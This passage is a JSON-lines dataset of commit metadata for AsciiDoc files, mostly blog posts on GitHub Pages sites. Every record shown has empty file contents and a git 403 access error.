2016-09-26-IT-Week-3.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-26-IT-Week-3.adoc","new_file":"_posts\/2016-09-26-IT-Week-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35f9728bbf6be902d3020f8dc62184f98a1685ba","subject":"Update 2016-12-23-TEMPLAT-E.adoc","message":"Update 2016-12-23-TEMPLAT-E.adoc","repos":"iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io","old_file":"_posts\/2016-12-23-TEMPLAT-E.adoc","new_file":"_posts\/2016-12-23-TEMPLAT-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iamthinkking\/iamthinkking.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a2e7efa3513127b79de924cc76f95d99d3d32d2","subject":"Update 2015-04-26-jQuery.adoc","message":"Update 2015-04-26-jQuery.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-04-26-jQuery.adoc","new_file":"_posts\/2015-04-26-jQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53b17b46fb85f4e67e99f75bc127498cc2a947f2","subject":"Update 2019-01-31-Blog-post-two.adoc","message":"Update 2019-01-31-Blog-post-two.adoc","repos":"mrfgl\/blog,mrfgl\/blog,mrfgl\/blog,mrfgl\/blog","old_file":"_posts\/2019-01-31-Blog-post-two.adoc","new_file":"_posts\/2019-01-31-Blog-post-two.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrfgl\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e44f4d475ace6c464b46dc0e50d1cb5d3ef1f7a8","subject":"Update 
2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","message":"Update 2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c51f79c62d43f2429227fb5c996adad140a019c4","subject":"Update 2016-02-15-Lets-Light-This-Candle.adoc","message":"Update 2016-02-15-Lets-Light-This-Candle.adoc","repos":"amberry\/blog,amberry\/blog,amberry\/blog,amberry\/blog","old_file":"_posts\/2016-02-15-Lets-Light-This-Candle.adoc","new_file":"_posts\/2016-02-15-Lets-Light-This-Candle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/amberry\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70854e12bf94f93320c2b0228e21b3fbb1e3abc6","subject":"Update 2016-12-04-Systems-Administration-or-Dev-Ops-or-Something.adoc","message":"Update 2016-12-04-Systems-Administration-or-Dev-Ops-or-Something.adoc","repos":"willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io","old_file":"_posts\/2016-12-04-Systems-Administration-or-Dev-Ops-or-Something.adoc","new_file":"_posts\/2016-12-04-Systems-Administration-or-Dev-Ops-or-Something.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willnewby\/willnewby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c79ac87ea7537794b3100c5939942136619eb4fc","subject":"Update 2016-12-31-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","message":"Update 2016-12-31-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2016-12-31-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_file":"_posts\/2016-12-31-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2960a1106324ea0848fced58f8ad0ac0b2350304","subject":"Update 2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","message":"Update 2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topranks\/topranks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"5b9db994a32ac0c90506b736898ee6ff42694a08","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e749df33328fe617fb4048383ef0465428a35907","subject":"Create do-code-block-es.adoc","message":"Create do-code-block-es.adoc\n\nSpanish translation for do-code-block-.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-code-block-es.adoc","new_file":"src\/do\/do-code-block-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"271ee2143ca0562911cfb51bf7d1b0fe6bba0ded","subject":"Initial readme","message":"Initial readme\n","repos":"lichia\/docker-scripts,jpopelka\/docker-scripts,TomasTomecek\/docker-scripts,goldmann\/docker-squash,goldmann\/docker-scripts","old_file":"squash\/README.adoc","new_file":"squash\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/goldmann\/docker-squash.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14fb9dc5def827bf02623f5c1a683d6f686021a2","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/hello_4.adoc","new_file":"content\/writings\/hello_4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d6a5fe35bb4daf81efbfd5db7025313266f9177c","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/hello_everyone.adoc","new_file":"content\/writings\/hello_everyone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8d80c1b7ecabb0c0789723b6a20d654d0556acb4","subject":"Update 2018-01-06-calculator-app-with-Swift.adoc","message":"Update 2018-01-06-calculator-app-with-Swift.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-06-calculator-app-with-Swift.adoc","new_file":"_posts\/2018-01-06-calculator-app-with-Swift.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"037611a6e5bcd466b883983f528100b317460db9","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f109d23293754d90650f722fbf507aae4e0b8423","subject":"Added configuration README","message":"Added configuration README","repos":"ivannov\/core,forge\/core,agoncal\/core,oscerd\/core,forge\/core,jerr\/jbossforge-core,agoncal\/core,ivannov\/core,agoncal\/core,ivannov\/core,ivannov\/core,stalep\/forge-core,D9110\/core,oscerd\/core,agoncal\/core,pplatek\/core,D9110\/core,pplatek\/core,ivannov\/core,ivannov\/core,pplatek\/core,forge\/core,ivannov\/core,oscerd\/core,forge\/core,stalep\/forge-core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,jerr\/jbossforge-core,forge\/core,agoncal\/core,jerr\/jbossforge-core,oscerd\/core,D9110\/core,D9110\/core,agoncal\/core,agoncal\/core,oscerd\/core,agoncal\/core,D9110\/core,pplatek\/core,D9110\/core,D9110\/core,jerr\/jbossforge-core,agoncal\/core,pplatek\/core,oscerd\/core,D9110\/core,pplatek\/core,jerr\/jbossforge-core,forge\/core,oscerd\/core,jerr\/jbossforge-core,ivannov\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,D9110\/core,pplatek\/core,oscerd\/core,ivannov\/core,agoncal\/core,D9110\/core,pplatek\/core,ivannov\/core,oscerd\/core,pplatek\/core,pplatek\/core,forge\/core,forge\/core,oscerd\/core,forge\/core","old_file":"configuration\/README.asciidoc","new_file":"configuration\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/D9110\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1351752c66b06414ab3b663d94157eda2fc62b1e","subject":"y2b create post A big TV that's good for gaming? (Sharp 60-inch LC-60LE857U Unboxing \\u0026 Demo)","message":"y2b create post A big TV that's good for gaming? 
(Sharp 60-inch LC-60LE857U Unboxing \\u0026 Demo)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-12-12-A-big-TV-thats-good-for-gaming-Sharp-60inch-LC60LE857U-Unboxing-u0026-Demo.adoc","new_file":"_posts\/2013-12-12-A-big-TV-thats-good-for-gaming-Sharp-60inch-LC60LE857U-Unboxing-u0026-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b96c5632ebba4197c8d6bbd634b28c561ac21936","subject":"y2b create post Far Cry 4 Kyrat Edition Unboxing \\u0026 Giveaway!","message":"y2b create post Far Cry 4 Kyrat Edition Unboxing \\u0026 Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-11-20-Far-Cry-4-Kyrat-Edition-Unboxing-u0026-Giveaway.adoc","new_file":"_posts\/2014-11-20-Far-Cry-4-Kyrat-Edition-Unboxing-u0026-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f99bf4bb202af4f936631d18f92a624debf732b4","subject":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","message":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da5d2ed5a634420b98d57d0508f8571a62ff0306","subject":"Update 2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","message":"Update 2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","new_file":"_posts\/2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07a0f9f41920a61c34c61555943d900313edd603","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8eaa5375691bd68cf765f898dfb36c61e1832d50","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85ccda332d29cc690f0bcb9ddd541950db9ca8a3","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e741d2d76716f2af5cdcefaa8919825a633d6e25","subject":"Add documentation for ui.style in noterc(5)","message":"Add documentation for ui.style in noterc(5)\n","repos":"rumpelsepp\/pynote","old_file":"man\/noterc.5.adoc","new_file":"man\/noterc.5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85aede01117aeb8b42ba0bb51dfe909e4e4f4a50","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d857fe81975cf20cb07b3edb6fe7ac0d31500c5d","subject":"Update 2015-09-19-JSON-in-Python.adoc","message":"Update 2015-09-19-JSON-in-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5be3bc4edf80376ffba5b9f99595b94fd899fc6b","subject":"Deleted _posts\/2016-12-01-Salut-potozebi.adoc","message":"Deleted 
_posts\/2016-12-01-Salut-potozebi.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Salut-potozebi.adoc","new_file":"_posts\/2016-12-01-Salut-potozebi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c5b28012cea7be1cf36b1015525a327c073ab0","subject":"Parse function","message":"Parse function\n","repos":"yurrriq\/cats,alesguzik\/cats,funcool\/cats,mccraigmccraig\/cats,OlegTheCat\/cats,tcsavage\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3351d13fd742550a95d5db25f0c400734f4b2136","subject":"Update 2017-07-14-O-que-e-Native-Script-e-a-comparacao-com-Xamarin-Ionic-e-React.adoc","message":"Update 2017-07-14-O-que-e-Native-Script-e-a-comparacao-com-Xamarin-Ionic-e-React.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-07-14-O-que-e-Native-Script-e-a-comparacao-com-Xamarin-Ionic-e-React.adoc","new_file":"_posts\/2017-07-14-O-que-e-Native-Script-e-a-comparacao-com-Xamarin-Ionic-e-React.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46626d363e17e200028c481a79e2a4cdad771b93","subject":"Update 2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","message":"Update 2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","new_file":"_posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32cc9d73e883fa2484aee454449bde9e3da3c073","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9e2223751bc2b6e66847da6e65c7c2b75ddcdb3","subject":"create post Which Smartphone Do They ACTUALLY Use? --- MKBHD, Austin Evans, Linus + More","message":"create post Which Smartphone Do They ACTUALLY Use? 
--- MKBHD, Austin Evans, Linus + More","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Which-Smartphone-Do-They-ACTUALLY-Use?-----MKBHD,-Austin-Evans,-Linus-+-More.adoc","new_file":"_posts\/2018-02-26-Which-Smartphone-Do-They-ACTUALLY-Use?-----MKBHD,-Austin-Evans,-Linus-+-More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3433f1fbf1057099e5d602d0ba1cfcdf952ec7aa","subject":"y2b create post Pelican PS3 Triggers Unboxing (GET MORE KILLS!)","message":"y2b create post Pelican PS3 Triggers Unboxing (GET MORE KILLS!)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-04-Pelican-PS3-Triggers-Unboxing-GET-MORE-KILLS.adoc","new_file":"_posts\/2011-03-04-Pelican-PS3-Triggers-Unboxing-GET-MORE-KILLS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ef4347d6c67f94f541e0cfd2b5c6040466d9bbc","subject":"Update 2019-03-25-Annotated-Paper-A-Decomposable-Attention-Model-for-Natural-Language-Inference.adoc","message":"Update 2019-03-25-Annotated-Paper-A-Decomposable-Attention-Model-for-Natural-Language-Inference.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-03-25-Annotated-Paper-A-Decomposable-Attention-Model-for-Natural-Language-Inference.adoc","new_file":"_posts\/2019-03-25-Annotated-Paper-A-Decomposable-Attention-Model-for-Natural-Language-Inference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bc2d02e00f3f845510e71a79c36681f3a19f6c9","subject":"y2b create post All Macbooks On SALE + Save on the G700 Gaming Mouse! (Deal Therapy)","message":"y2b create post All Macbooks On SALE + Save on the G700 Gaming Mouse! 
(Deal Therapy)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-06-All-Macbooks-On-SALE--Save-on-the-G700-Gaming-Mouse-Deal-Therapy.adoc","new_file":"_posts\/2013-05-06-All-Macbooks-On-SALE--Save-on-the-G700-Gaming-Mouse-Deal-Therapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c4858d1677adb90be79e0b4c6c4ccf47d2466c5","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffd6dc36489c030eaf38ef422d5dd77e0a6ba3d9","subject":"y2b create post Canon 60D Unboxing","message":"y2b create post Canon 60D Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-05-30-Canon-60D-Unboxing.adoc","new_file":"_posts\/2011-05-30-Canon-60D-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0258dd1bcd639c198b8daf0434f43b4e190fee5","subject":"Update 2015-05-11-non-android-phones.adoc","message":"Update 2015-05-11-non-android-phones.adoc","repos":"hapee\/hapee.github.io,hapee\/hapee.github.io,hapee\/hapee.github.io","old_file":"_posts\/2015-05-11-non-android-phones.adoc","new_file":"_posts\/2015-05-11-non-android-phones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hapee\/hapee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5eb1493d6cd78229730afda8cff9714dd896ac8","subject":"Update 2015-09-23-Garbage-Collection.adoc","message":"Update 2015-09-23-Garbage-Collection.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"871ac75f93c57ce2e459efacbf8301e143cc3d8d","subject":"Clarified attestation wording","message":"Clarified attestation wording\n\n#5258\n","repos":"khartec\/waltz,davidwatkins73\/waltz-dev,kamransaleem\/waltz,khartec\/waltz,khartec\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,kamransaleem\/waltz,davidwatkins73\/waltz-dev,khartec\/waltz,kamransaleem\/waltz,kamransaleem\/waltz","old_file":"docs\/design\/draft\/product-handling-options\/product-handling-options.adoc","new_file":"docs\/design\/draft\/product-handling-options\/product-handling-options.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f3e08544057b9087f2abd221a3b4b9b556c7d8a","subject":"Update 2016-08-15-Wechat.adoc","message":"Update 2016-08-15-Wechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-15-Wechat.adoc","new_file":"_posts\/2016-08-15-Wechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9341d22daa24ababa971ce896de5d3b65becef5c","subject":"add 1.0.1 release notes to prior_release_notes.adoc","message":"add 1.0.1 release notes to prior_release_notes.adoc\n\nChange-Id: Ieff57fd7120e98e2e1a7c0812e6c04eca704c6ad\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4699\nTested-by: Kudu Jenkins\nReviewed-by: Jean-Daniel Cryans 